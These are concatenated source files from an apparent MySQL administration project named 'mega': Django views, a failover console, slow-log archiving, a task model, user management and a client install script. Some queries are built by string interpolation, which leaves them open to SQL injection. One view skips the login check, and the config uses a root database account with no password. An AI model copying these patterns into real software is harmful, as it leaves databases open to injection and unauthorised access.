instance=instance_manage.InstanceGet().get_instance_by_id(instance_id)\n groupbydb=slowlog.get_chart_groupbydb(instance_id,begin,end)\n topsql=slowlog.get_instance_topsql(instance_id,begin,end)\n return render_to_response('slowlog_report_instance.html',{'instance_list':meta_data.instance_list(),'total':total,'instance':instance,'groupbydb':groupbydb,'topsql':topsql},\n context_instance=RequestContext(request))\n@login_required \ndef failover(request):\n msg=''\n if request.method=='GET':\n ip=request.GET.get('ip')\n failover_list=FailoverGet().get_failover_list(ip=ip)\n\n if request.method=='POST':\n action=request.POST.get('action')\n if action=='add':\n result,msg=FailoverManage(request.POST).add_failover()\n else:\n result,msg=FailoverManage(request.POST).mod_failover()\n failover_list=FailoverGet().get_failover_list()\n wvips=meta_data.vip_list(type=1)\n rvips=meta_data.vip_list(type=2)\n managers=meta_data.server_list(('type',2))\n masters=meta_data.instance_list({'i.role':1})\n return render_to_response('failover.html',{'msg':msg,'wvips':wvips,'rvips':rvips,'managers':managers,'masters':masters,'failover_list':failover_list},context_instance=RequestContext(request))\n\ndef switch(request): \n failover=request.GET\n slaves=[]\n if failover.get('method'):\n result=FailoverManage(failover).change_master(failover.get('id'),failover.get('slave'),failover.get('method'))\n #return HttpResponse('123')\n return HttpResponse(result)\n else:\n masterid=failover.get('masterid')\n slaves=instance_manage.InstanceGet().get_instance_slaves(masterid)\n return render_to_response('switch.html',{'failover':failover,'slaves':slaves,'methods':meta_data.failover_method})\n\n@login_required \ndef switch_detail(request):\n '''\n only recieve get request\n '''\n if request.method=='POST':\n return render_to_response('switch_detail.html')\n #failover\n failoverid=request.GET.get('failoverid')\n new_masterid=request.GET.get('new_master')\n method=request.GET.get('method','') \n new_master=instance_manage.InstanceGet().get_instance_by_id(new_masterid)\n failover=FailoverGet().get_failover_by_id(failoverid)\n if failover:\n failover['method']=method\n failover['new_master']=new_master.get('ip')+':'+str(new_master.get('port'))\n #history\n failover_his=FailoverGet().get_failover_history(failoverid)\n #log\n record_id=FailoverGet().get_newest_record(failoverid)\n failover_log=FailoverGet().get_failover_history_detail(record_id)\n result=FailoverGet().get_failover_result(record_id)\n failover['result']=result.get('result')\n return render_to_response('switch_detail.html',{'failover':failover,'failover_his':failover_his,'failover_log':failover_log})\n return render_to_response('switch_detail.html')\n\n@login_required \ndef baseinfo(request):\n return render_to_response('baseinfo.html')\n\n@login_required \ndef baseinfo_instance(reqeust):\n return render_to_response('baseinfo_instance.html')\n\n@login_required \ndef status(request): \n return render_to_response('status.html')\n\n@login_required \ndef report(request): \n return render_to_response('report.html')\n\ndef my_404_view(request):\n response = render_to_response('404.html',context_instance=RequestContext(request))\n response.status_code = 404\n return response\n \ndef my_500_view(request):\n return render_to_response('500.html')\n\n" }, { "alpha_fraction": 0.5333333611488342, "alphanum_fraction": 0.5904762148857117, "avg_line_length": 12.125, "blob_id": "b4fb09f0e24238eda366a6812bc8598f18c29174", "content_id": "bec9e0a689a55c068cdb579e4582f6cff1183882", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 105, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/src/mega_web/charts/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 4, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.__init__\n'''\n" }, { "alpha_fraction": 0.5075594186782837, "alphanum_fraction": 0.5269978642463684, "avg_line_length": 14.466666221618652, "blob_id": "a99cebfc73e94c3addc42b1dafe18763b64524d4", "content_id": "5eb26d38cb890b9cff6f81224899e6d34ef2acf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 32, "num_lines": 30, "path": "/src/mega_service/monitor.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:mega_service.monitor\n'''\nfrom lib.logs import Logger\n\nMODEL='Monitor'\nlog=Logger(MODEL).log()\n\nclass Monitor():\n def __init__(self,queue):\n self.q=queue\n def bussiness_monitor(self):\n '''\n 1.backup\n 2.slowlog\n '''\n \n pass\n def sys_monitor(self):\n pass\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4735729396343231, "alphanum_fraction": 0.48343902826309204, "avg_line_length": 26.66666603088379, "blob_id": "22bb7f36cf2b7e5ffaa3e0e74c6a603ecb61aa6b", "content_id": "797f113a047b22b63693919fce9c96637c658418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1419, "license_type": "no_license", "max_line_length": 132, "num_lines": 51, "path": "/src/mega_web/charts/chart.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 19, 2014\n\n@author: xchliu\n'''\n\nclass Chart(object):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n self.slowlog={'xaxis':[],'data':[]}\n self.yaxis_name=''\n self.data_list=[]\n self.type='line'\n self.title=''\n\n \n def generate(self,data,title=None,*kwgs,**args):\n '''\n data: a list of data [(1,2,3),(2,2,3)]\n \n '''\n if title:\n self.title=title\n self.slowlog['title']=title\n if self.yaxis_name:\n self.slowlog['yaxis_name']=self.yaxis_name\n self.slowlog['type']=self.type\n for line in self.data_list:\n self.slowlog['data'].append({line:[]})\n for d in data:\n self.slowlog['xaxis'].append(str(d[0]))\n for i in range(len(self.data_list)):\n self.slowlog['data'][i][self.data_list[i]].append(int(d[i+1]))\n self.slowlog['xaxis']=[x for x in self.slowlog['xaxis']]\n return self.slowlog\n \n def js_pack(self):\n data='''{chart: {type: %s},\n title: {text: %s},\n xAxis: {categories: %s},\n yAxis: {title: {text:%s}},\n series: %s\n }\n ''' %(self.type,self.title,[x for x in self.slowlog['xaxis']],self.slowlog['yaxis_name'],[ x for x in self.slowlog['data']])\n return data\n " }, { "alpha_fraction": 0.6838340759277344, "alphanum_fraction": 0.7010014057159424, "avg_line_length": 19.558822631835938, "blob_id": "0599416135c2aa2501569f9e3b784701fd265254", "content_id": "d5d4026a0a7c52fdabbd4bb70dfc2a82219ef89a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 699, "license_type": "no_license", "max_line_length": 63, "num_lines": 34, "path": "/src/mega_client/install.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#Created on Jul 31, 2014\n\n#@author: xchliu\n\n#@module:mega_client.mega_client.install\n\nPROJECT=\"mega_client\"\nif [[ `id -u` -ne 0 ]];then\n\techo 'Need root!'\n\texit 1\nfi\n\np_path=`dirname $0`\nl_path=`pwd`\n\nmkdir -p /var/log/mega/ \nchmod -R 777 /var/log/mega/\n\ncd $p_path\necho \"install python package...\"\necho build >>record.info\ncat record.info| xargs rm -rf\n\npython setup.py build\npython setup.py install --record record.info\nchmod a+x $l_path/mega_client/mega_client.py\nln -sf $l_path/mega_client/mega_client.py /etc/init.d/$PROJECT\necho \"add to rc.local\"\necho \"python /etc/init.d/$PROJECT restart\" >>/etc/rc.local\necho \"start service...\" \npython /etc/init.d/$PROJECT restart\necho \"done\"\n" }, { "alpha_fraction": 0.5689072608947754, "alphanum_fraction": 0.5745400190353394, "avg_line_length": 27.645160675048828, "blob_id": "73ae7dd94b4df84172e55884cbb74c053ac0ebeb", "content_id": "1e5d38964e7294920352f55a17fb01116d0c0f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2663, "license_type": "no_license", "max_line_length": 69, "num_lines": 93, "path": "/src/mega_web/console/task.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 4, 2014\n\n@author: xchliu\n\n@module:mega_web.console.task\n'''\n\nimport datetime\nfrom mega_web.entity.models import Task\nfrom mega_web.entity.models import User\n\nDEFAULT_TASK_CYCLE=120\n\n\nclass TaskManage():\n def __init__(self,task):\n self.task=task\n self.t=Task()\n self.task_id=self.task.get('id')\n self.task_name=self.task.get('task_name')\n self.task_type=self.task.get('task_type')\n self.task_value=self.task.get('task_value')\n self.task_script=self.task.get('task_script')\n self.task_cycle=self.task.get('task_cycle')\n self.task_target=self.task.get('task_target')\n self.task_owner=self.task.get('task_owner')\n self.task_stat=self.task.get('task_stat')\n \n def task_add(self):\n if not self.task_value and not self.task_script:\n return -1,'Value or script should be provided'\n if self.task_name:\n self.t.name=self.task_name\n else:\n self.t.name=self.task_value\n self.t.type=self.task_type\n self.t.value=self.task_value\n self.t.script=self.task_script\n if self.task_cycle:\n self.t.cycle=self.task_cycle\n else:\n self.t.cycle=DEFAULT_TASK_CYCLE\n \n self.t.target=self.task_target\n self.t.owner=self.task_owner\n self.t.stat=self.task_stat\n _now=datetime.datetime.now()\n self.t.last_time=_now\n self.t.create_time=_now\n self.t.save()\n \n return 1,'Success'\n \n def task_mod(self):\n if not self.task_id:\n return False\n _task=Task.objects.get(id=self.task_id)\n if not self.task_value and not self.task_script:\n return -1,'Value or script should be provided'\n if self.task_name:\n _task.name=self.task_name\n else:\n _task.name=self.task_value\n _task.type=self.task_type\n _task.value=self.task_value\n _task.script=self.task_script\n if self.task_cycle:\n _task.cycle=self.task_cycle\n else:\n _task.cycle=DEFAULT_TASK_CYCLE\n \n _task.target=self.task_target\n _task.owner=self.task_owner\n _task.stat=self.task_stat\n _task.save()\n return 1,'success'\n\n \n def get_task_by_id(self):\n task=Task.objects.filter(id=self.task_id).values()\n if task:\n task=task[0]\n owner=User.objects.filter(id=task['owner']).values('name')[0]\n task['owner_name']=owner['name']\n return task\n \n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5181818008422852, "alphanum_fraction": 0.5909090638160706, "avg_line_length": 11.333333015441895, "blob_id": "f62e49e9a521dbd34a0be2c84ac4b6dbe1da5274", "content_id": "b17ebce36640084c99fabd47cc2eb213537491cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 110, "license_type": "no_license", "max_line_length": 24, "num_lines": 9, "path": "/src/release/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 2, 2014\n\n@author: xchliu\n\n@module:release.__init__\n'''\nversion='1.0'" }, { "alpha_fraction": 0.5220385789871216, "alphanum_fraction": 0.6322314143180847, "avg_line_length": 37.157894134521484, "blob_id": "c4aa67736475e076e9f2e66d990ef0a9feacc1bc", "content_id": "bec8dcf1a598a6b0f873e642c007596962c46b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 726, "license_type": "no_license", "max_line_length": 88, "num_lines": 19, "path": "/src/tests/console_failover.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom mega_client import sender\nfrom mega_client.setting import MEGA_HOST\nformat='%Y-%m-%d %X'\nnow=time.strftime(format, time.localtime())\n\n\ncmd={\"update_ha_info\":\"'1.1.1.112:23','1.1.1.111:3306'\",\n #\"add_failover_record\":\"10,'ONLINE','1.1.1.112:23','1.1.1.111:3306'\",\n \"add_failover_record\":\"None,'ONLINE','1.1.1.112:23','1.1.1.111:3306','jjjj'\",\n \"stat_failover_record\":\"32,'Y'\",\n \"add_failover_record_detail\":\"31,'mega','%s','10','y','test the api'\" % now,\n }\n#record_id,module,re_time,time_used,result,content\nfor _cmd,f in cmd.iteritems():\n c=sender.MegaClient(host=MEGA_HOST,cmd=_cmd)\n r=c.run(func_args=f)\n c.close() \n print \"test %s %s: %s\" %(_cmd,f,r)\n\n" }, { "alpha_fraction": 0.5135501623153687, "alphanum_fraction": 0.5189701914787292, "avg_line_length": 27.423076629638672, "blob_id": "7827b84818f06d16fab5dee230258f938cfab220", "content_id": "869116e2031eea56ba71951e03e2315e92232a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 66, "num_lines": 26, "path": "/src/mega_service/task.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from lib.PyMysql import PyMySQL\n\n\nclass Task():\n def __init__(self):\n self.q=PyMySQL()\n def stat_task_by_id(self,id,stat_time=0):\n if stat_time == 0:\n sql=\"update task set last_time=now() where id=%s\" % id\n if self.q.execute(sql):\n return True\n return False\n \n def get_task_by_name(self,name):\n if name:\n sql=\"select script from task where name='%s'\" % name\n return self.q.fetchOne(sql)\n else:\n return False\n \n def get_task_list(self,stat=1):\n if stat == -1 :\n sql=\"select * from task\"\n else:\n sql=\"select * from task where stat=%s\" % stat\n return self.q.fetchAll(sql)" }, { "alpha_fraction": 0.604667603969574, "alphanum_fraction": 0.6117397546768188, "avg_line_length": 19.794116973876953, "blob_id": "75d32d6fdd19a0b85a8202b55813fe7fcedc1102", "content_id": "d6e685e9141db509cd5362fef64080ac602e3cf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3346, "license_type": "no_license", "max_line_length": 129, "num_lines": 136, "path": "/docs/develop.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#开发规范\n\n##目录说明\n\t\n\tmega/\n\t\t* api 公用调用接口\n\t\t* conf 配置文件\n\t\t* docs \t\t 各类文档\n\t\t* lib \t\t 公用库\n\t\t* log \t\t 日志\n\t\t* mega_server 服务后台\n\t\t* mega_web web 项目\n\t\t* release 发布日志\n\t\t* scripts 脚本\n\t\t* tests\t\t 测试用例\n\n## 依赖包\n\npython 2.6/2.7\n\nDjango-1.6.5\n\npip install django_chartit\n\npython-daemon 1.5.5 <a>https://pypi.python.org/pypi/python-daemon/1.5.5]</a>\n\n##代码规范\n\n[google python stype](https://github.com/xchliu/zh-google-styleguide/blob/master/google-python-styleguide/python_style_rules.rst)\n\n###字符集:utf8\t# -*- coding: UTF-8 -*-\n\n\n###定义\n\n* 类命规则:单词首字母大写,无连接符,空2行,必须有`__init__`函数 class Daemon()\n* 函数规则:小写,下划线连接,空1行,必须有`__doc__` def mega_daemon(**argv)\n* 内部函数:同函数,以下划线开头\t\tdef _run(self)\n\n\n###函数:\n\n* 显示定义参数格式及默认值\n* 返回值必须为有效性,不能直接return,或return None\n\n \n##api\n\n\n##lib\n* logs 日志统一模块\n\t\n\t\tMODEL='Listener'\n\t\tlog = Logger(MODEL).log()\n* PyMysql 连接MySQL通用库\n* utils 常用小工具\n* sendmail 邮件发送统一接口\n\n\n###DB\n数据库访问方式:\n\n1. 使用models类 见mega_web/models/*\n\n2. 使用MySQLdb 见lib/PyMysql\n\n\n##mega_web\nmega 主页\n\n管理 资源管理\n\n调度 任务调度管理\n\n\t\t\n\turl(r'^$',home),\n url(r'^resource/$',resource),\n url(r'^portal/$',portal),\n url(r'^monitor/$',monitor),\n url(r'console/$',console),\n url(r'charts/$',charts),\n url(r'^fun/$',fun),\n\n\t#sub url\n url(r'^resource/instance/$',instance),\n url(r'^resource/instance_add/$',instance_add),\n url(r'^resource/instance_detail/$',instance_detail),\n \n url(r'^resource/server/$',server),\n url(r'^resource/server_add/$',server_add),\n url(r'^resource/server_detail/$',server_detail),\n\n url(r'^resource/business/$',business),\n url(r'^resource/business_add/$',business_add),\n url(r'^resource/business_detail/$',business_detail),\n\n url(r'^resource/database/$',database),\n url(r'^resource/database_add/$',database_add),\n url(r'^resource/database_detail/$',database_detail),\n \n url(r'^resource/user/$',user),\n url(r'^resource/user_add/$',user_add),\n url(r'^resource/user_detail/$',user_detail),\n \n \n url(r'^console/backup/$',backup),\n url(r'^console/backup/backup_config/$',backup_config),\n url(r'^console/backup/backup_config_list/$',backup_config_list),\n\n\t\t\n##mega_service\nTCP 通信数据包规范:\n\n \"\"\" work instance:{'HEAD':'MEGA','TYPE':'CMD','VALUE':'ls'}\n keys:\n HEAD: for safe interactive,should be MEGA\n TYPE: cmd,task,other\n VALUE: what to do : ls\n TIME: when to do : 0 once ,\n REPEAT: lifecycle of job day,week,month\n TARGET: uniqeu identify for server or instance or database.\n \"\"\"\n\n\n##scripts\n* init_db.sql 初始化项目db脚本\n* install.sh 部署脚本\n* mega_salt.py salt接口脚本\n* mega_service.sh mega服务脚本\n\n##tests\n路径:tests/*\n####api\n* api_resource.py 资源池管理接口测试用例\n* slow_log.py slow log添加接口\n* update_backupinfo.py 备份过程中的信息更新接口\n" }, { "alpha_fraction": 0.6102661490440369, "alphanum_fraction": 0.6368821263313293, "avg_line_length": 22.954545974731445, "blob_id": "2e8647908f6665ed95def0a4d2b68247e55182f5", "content_id": "d638fd52a251fcaf19136e2c7016e74280c5212f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 554, "license_type": "no_license", "max_line_length": 60, "num_lines": 22, "path": "/src/conf/settings.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n\nSERVICE_NAME='mega'\nTRACKER_LIFCYCLE=10\nDAEMON_PID='/var/run/%s.pid' % SERVICE_NAME\nDAEMON_LOG='/var/log/%s.log' % SERVICE_NAME\nLOG_FILE_NAME=DAEMON_LOG\n\n\nclass DbConfig():\n def __init__(self):\n pass\n db_host='127.0.0.1'\n db_port=3306\n db_user='root'\n db_pwd=''\n db_db='mega'\n db_charset='utf8'\n\nMEGA_SERVER=\"mega-server.d.chinabank.com.cn\" #mega 后台服务\nEMAIL_SERVER=\"mega-email.d.chinabank.com.cn\" # mega 邮件服务器\nSMS_SERVER=\"mega-sms.d.chinabank.com.cn\" #mega 短信服务器" }, { "alpha_fraction": 0.549346387386322, "alphanum_fraction": 0.556209146976471, "avg_line_length": 31.221052169799805, "blob_id": "cb3805a00c3d5684167d80fd8ec1b1b94174337e", "content_id": "6e1d282b4163363f512da7782ef66fedb606131d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3060, "license_type": "no_license", "max_line_length": 153, "num_lines": 95, "path": "/src/mega_web/resource/user_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jun 26, 2014\n\n@author: xchliu\n\n@module:mega_web.resource.user_manage\n'''\nfrom mega_web.entity.models import Users\nfrom conf.GlobalConf import DEFAULT_PWD,MSG_ERR_NAME,STAT_ONLINE\n\nclass UserManage():\n def __init__(self,user_info):\n self.user=Users\n self.user_id=user_info.get(\"user_id\")\n self.user_name=user_info.get(\"name\")\n self.user_sign=user_info.get(\"sign\")\n self.user_role=user_info.get(\"role\")\n self.user_pid=user_info.get(\"pid\")\n self.user_pwd=user_info.get(\"pwd\")\n self.user_phone=user_info.get(\"phone\")\n self.msg=''\n def user_add(self):\n if not self.data_check():\n return False,self.msg\n _user=Users(name=self.user_name,role=self.user_role,sign=self.user_sign,p_id=self.user_pid,pwd=self.user_pwd,phone=self.user_phone,stat=STAT_ONLINE)\n _user.save()\n self.msg='success'\n return True,self.msg\n def user_mod(self):\n if not self.data_check():\n return False,self.msg\n _user=self.user.objects.get(id=self.user_id)\n _user.name=self.user_name\n _user.role=self.user_role\n _user.sign=self.user_sign\n _user.p_id=self.user_pid\n _user.pwd=self.user_pwd\n _user.phone=self.user_phone\n _user.save()\n self.msg='success'\n return True,self.msg\n def user_stat(self):\n if not self.user_id:\n return False,self.msg\n _user=self.user.objects.get(id=self.user_id)\n if _user.stat == 1:\n _user.stat=0\n else:\n _user.stat=1\n _user.save()\n return True,self.msg\n def data_check(self):\n if not self.user_name:\n self.msg=MSG_ERR_NAME\n return False\n if not self.user_role:\n self.user_role=1\n if not self.user_sign:\n self.user_sign=''\n if not self.user_pid:\n self.user_pid=1\n if not self.user_pwd:\n self.user_pwd=DEFAULT_PWD\n if not self.user_phone:\n self.user_phone=0\n return True\nclass UserGet():\n def __init__(self):\n self.user=Users\n def get_user_list(self,str_filter,count=10,offset=0):\n result=None\n \n if not str_filter:\n str_filter=''\n if len(str_filter) ==0:\n if count==0:\n result=self.user.objects.all().order_by('-stat').values()\n else:\n result=self.user.objects.all().order_by('-stat')[offset:count].values()\n else:\n value=str_filter['name'] \n if len(value) <> 0:\n result=self.user.objects.filter(name=value)[offset:count].values()\n else:\n result=self.user.objects.all().order_by('-stat').values()\n\n return result\n def get_user_by_id(self,user_id):\n if not user_id:\n return False\n result=self.user.objects.filter(id=user_id).values()\n if len(result)>0:\n return result[0]\n return False" }, { "alpha_fraction": 0.5332680940628052, "alphanum_fraction": 0.6193737983703613, "avg_line_length": 20.76595687866211, "blob_id": "3db2822e9a2bb2711e9bc81511afb4446f15967d", "content_id": "c6ac2f4207940b19160fe3a3423715917e0bb59c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 48, "num_lines": 47, "path": "/src/tests/update_backupinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append(\"..\")\nfrom mega_service.sender import MegaClient\n\nvar='''task_info={ \"backup_tool\": \"xtrabackup\", \n\"backup_type\": \"full\",\n\"db_type\":\"mysql\",\n\"backup_level\":\"instance\",\n\"level_value\":\"\",\n\"need_data\":\"Y\",\n\"need_schema\":\"Y\",\n\"rsync\":\"Y\",\n\"message\": \"xtrabackup is running now!\", \n\"host_ip\": \"172.17.62.37\", \n\"id\": 1, \n\"isEncrypted\": \"Y\", \n\"iscompress\": \"Y\", \n\"port\": 3309, \n\"retention\": \"7\", \n\"status\": 1},action='insert'\n'''\nvar_update='''task_info={\"id\":82,\n\"status\": 'Y',\n\"is_delete\":'Y',\n\"backup_begin_time\":'2013:01:01 02:02:02',\n\"backup_end_time\":'2013:01:01 02:02:02',\n\"rsync_begin_time\":'2013:01:01 02:02:02',\n\"rsync_end_time\":'2013:01:01 02:02:02',\n'file_size':'2013:01:01 02:02:02',\n'message':'test update'},action='update'\n'''\n\ndef test_insert():\n cmd='update_backupinfo'\n c=MegaClient(cmd=cmd)\n print c.run(var)\ndef test_update():\n cmd='update_backupinfo'\n c=MegaClient(cmd=cmd)\n print c.run(var_update)\n\n\n\n\nif __name__==\"__main__\":\n test_insert()\n test_update()" }, { "alpha_fraction": 0.6422535181045532, "alphanum_fraction": 0.6464788913726807, "avg_line_length": 30.921348571777344, "blob_id": "d4dabe994cebe5ea18d0a76787b819fcde9ac4b2", "content_id": "4278d1f6a9e6887b83bc00cb96630679f610ca6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2840, "license_type": "no_license", "max_line_length": 118, "num_lines": 89, "path": "/src/mega_web/urls.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from views import * \nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf.urls import patterns, include, url\n\n\n#admin\nadmin.autodiscover()\n\n#for error catch\nhandler404 = my_404_view\nhandler500 = my_500_view\n\n\nurlpatterns = patterns('',\n url(r'^$',home),\n url(r'^portal/$',portal),\n url(r'^tunning/$',tunning),\n url(r'^console/$',console),\n url(r'^mega-admin/$',mega_admin),\n url(r'^login/$',login),\n url(r'^accounts/login/$',login),\n url(r'^logout/$',logout),\n #django\n url(r'^admin/', include(admin.site.urls)),\n #sub url\n url(r'^resource/instance/$',instance),\n url(r'^resource/instance_add/$',instance_add),\n url(r'^resource/instance_detail/$',instance_detail),\n \n url(r'^resource/server/$',server),\n url(r'^resource/server_add/$',server_add),\n url(r'^resource/server_detail/$',server_detail),\n\n url(r'^resource/business/$',business),\n url(r'^resource/business_add/$',business_add),\n url(r'^resource/business_detail/$',business_detail),\n\n url(r'^resource/database/$',database),\n url(r'^resource/database_add/$',database_add),\n url(r'^resource/database_detail/$',database_detail),\n \n url(r'^resource/user/$',user),\n url(r'^resource/user_add/$',user_add),\n url(r'^resource/user_detail/$',user_detail),\n \n url(r'^resource/vip/$',vip),\n \n \n url(r'^console/backup/$',backup),\n url(r'^console/backup/backup_config/$',backup_config),\n url(r'^console/backup/backup_config_list/$',backup_config_list),\n\n url(r'^console/task/$',task),\n url(r'^console/task/task_add/$',task_add),\n url(r'^console/task/task_detail/$',task_detail),\n\n\n url(r'^tunning/slowlog/config/$',slowlog_config),\n url(r'^tunning/slowlog/report/$',slowlog_report),\n url(r'^tunning/slowlog/report/sql/$',slowlog_sql),\n url(r'^tunning/slowlog/report/instance/$',slowlog_instance),\n\n url(r'^console/failover/$',failover),\n url(r'^console/failover/switch/$',switch),\n url(r'^console/failover/switch/detail/$',switch_detail),\n \n url(r'^monitor/$',monitor),\n url(r'^monitor/baseinfo/$',baseinfo),\n url(r'^monitor/baseinfo/instance/$',baseinfo_instance),\n #url(r'^monitor/baseinfo/server/$',baseinfo_server),\n #url(r'^monitor/baseinfo/database/$',baseinfo_database),\n #url(r'^monitor/baseinfo/table/$',baseinfo_table),\n\n url(r'^monitor/status/$',status),\n url(r'^monitor/report/$',report),\n\n\n url(r'^portal/document/$',document),\n \n url(r'^mega-admin/client/$',client),\n \n #for static like css ,js ,ima,music \n url(r'^static/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.STATIC_URLS },name=\"static\"),\n\n #other\n url(r'^fun/$',fun), \n)+static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)" }, { "alpha_fraction": 0.575875461101532, "alphanum_fraction": 0.5859922170639038, "avg_line_length": 28.9069766998291, "blob_id": "56547c0beba296504ee1407e94b402ebbd3baede", "content_id": "f8d0b13b2a9397b03866e9acf96b3f13646f1926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1285, "license_type": "no_license", "max_line_length": 80, "num_lines": 43, "path": "/src/mega_web/admin/client_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 7, 2014\n\n@author: xchliu\n\n@module:mega_web.admin.client_manage\n'''\nimport datetime\nfrom mega_web.entity.models import Client,Server\n\nclass ClientGet():\n '''\n '''\n def __init__(self):\n self.client=Client\n self.server=Server\n self.LIFECYCLE=300\n \n def get_client_list(self):\n client_list=self.client.objects.all().values().order_by(\"-heartbeat\")\n for client in client_list:\n _server=self.server.objects.filter(id=client['server_id'])\n if _server:\n client['ip']=_server.values('ip')[0]['ip']\n _heartbeat=(datetime.datetime.now()-client['heartbeat']).seconds\n if _heartbeat > self.LIFECYCLE:\n client['stat']=0\n else:\n client['stat']=1\n return client_list\n def get_client_statics(self):\n count={}\n _time=datetime.datetime.now()-datetime.timedelta(seconds=self.LIFECYCLE)\n count['server']=Server.objects.filter(stat__gt=0).count()\n count['online']=Client.objects.filter(heartbeat__gt=_time).count()\n count['offline']=Client.objects.filter(heartbeat__lt=_time).count()\n return count\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6996337175369263, "alphanum_fraction": 0.7289377450942993, "avg_line_length": 33.125, "blob_id": "c2959351553812fe3a8e28b0293f5266ac13ba3f", "content_id": "f2bb5a6225509d7e70be23a62ee75fb8cf16eea2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 273, "license_type": "no_license", "max_line_length": 82, "num_lines": 8, "path": "/src/scripts/init_db.sql", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#\n\nuse mega;\n\ninsert into user(name,stat) values('DBA',1);\ninsert into business(name,owner)values('None',1);\ninsert into task (name,type,value,cycle) values('backup',0,'backup_routine',60);\ninsert into task (name,type,value,cycle) values('slowlog',0,'slowlog_routine',60);\n" }, { "alpha_fraction": 0.5277582406997681, "alphanum_fraction": 0.540173351764679, "avg_line_length": 43.0206184387207, "blob_id": "1843559cfb563a0c8d991fcc75fb8cc84d1d365a", "content_id": "56c1cb9f6b404cea81f22befcd005720c8a20fe7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 208, "num_lines": 97, "path": "/src/mega_service/slowlog/slowlog_archive.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 20, 2014\n\n@author: xchliu\n\n@module:mega_service.slowlog.slowlog_archive\n'''\nimport time\nfrom hashlib import md5\nfrom lib.sql_parse import SQLParse\nfrom lib.PyMysql import PyMySQL\nfrom lib.utils import today\nfrom lib.logs import Logger\n\n\nMODEL='slowlog_statics'\nlog = Logger(MODEL).log()\n#from mega_web.resource.instance_manage import InstanceGet\n\ndef slowlog_statics_per_hour(v_time):\n '''\n 1.slowlog_archive_hour \n 2.slowlog_time_day\n '''\n #get the \n _hour=v_time.split(':')[0]\n _pre_hour=int(_hour)-1\n _time=\"%s %s:00:00\" % (today(),_hour)\n _pre_time=\"%s %s:00:00\" % (today(),_pre_hour)\n _pre_time=int(time.mktime(time.strptime(_pre_time,'%Y-%m-%d %H:%M:%S')))\n _time=int(time.mktime(time.strptime(_time,'%Y-%m-%d %H:%M:%S')))\n sql_1='''insert into slowlog_sql_hour(hash_code,log_time,counts,max_time,avg_time,min_time,max_row,avg_row,min_row)\n select hash_code,from_unixtime(start_time),count(*),max(query_time),avg(query_time),min(query_time),max(rows_examined),avg(rows_examined),min(rows_examined) \n from slowlog_info where start_time between '%s' and '%s' group by hash_code;''' %(_pre_time,_time)\n #log.debug(sql_1)\n result,ex=PyMySQL().execute(sql_1)\n if not result :\n log.error(ex)\n \n #\n sql_2=\"select instance_id,dbname,start_time,count(*) as counts from slowlog_info where start_time between '%s' and '%s' group by instance_id,dbname;\" \\\n % (_pre_time,_time)\n #log.debug(sql_2)\n 